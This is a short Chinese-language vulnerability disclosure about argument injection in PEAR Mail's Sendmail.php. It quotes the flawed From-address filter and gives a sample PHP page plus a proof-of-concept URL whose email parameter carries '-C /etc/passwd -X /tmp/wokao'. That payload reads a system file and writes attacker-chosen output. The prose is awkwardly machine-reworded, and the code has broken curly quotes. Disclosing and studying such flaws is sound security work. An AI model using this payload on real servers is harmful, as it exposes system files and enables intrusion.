发生问题的地方位于Sendmail.php
......
if (!isset($from)) {
return PEAR::raiseError('No from address given.');
} elseif (strpos($from, ' ') !== false ||
strpos($from, ';') !== false ||
strpos($from, '&') !== false ||
strpos($from, '`') !== false) {
return PEAR::raiseError('From address specified with dangerous characters.');
}
$from = escapeShellCmd($from);
$mail = @popen($this->sendmail_path . (!empty($this->sendmail_args) ? ' ' . $this->sendmail_args : '') . " -f$from -- $recipients", 'w');
if (!$mail) {
return PEAR::raiseError('Failed to open sendmail [' . $this->sendmail_path . '] for execution.’);
}
……
能够看见$from 自变量的过虑并不彻底,因为escapeShellCmd会将\等标识符更换为空,就可以绕开对空格符的查验,而escapeshellcmd本身并不检查针对主要参数的启用,因此造成网络安全问题的产生。
系统漏洞检测:
<?php
ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:');
require_once("Mail.php");
$from = "From: " . $_REQUEST['email'] . “\r\n”;
$to = “xxxxxxx@zzzz.com”;
$subj = “subscription request”;
$body = “subscribe me”;
$hdrs = array(
“To” => $to,
“Cc” => $cc,
“Bcc” => $bcc,
“From” => $from,
“Subject” => $subject,
);
$body=”test”;
$mail =& Mail::factory(’sendmail’);
$mail->send($to, $hdrs, $body);
?>
http://www.80sec.com/index.php?1=3&email=xxxxx -C /etc/passwd -X /tmp/wokao zzz@x .com&l=2&1=3
就可以见到此系统漏洞的运用。
系统漏洞危害:全部PEAR的Mail函数公式包
系统漏洞情况:通告官方网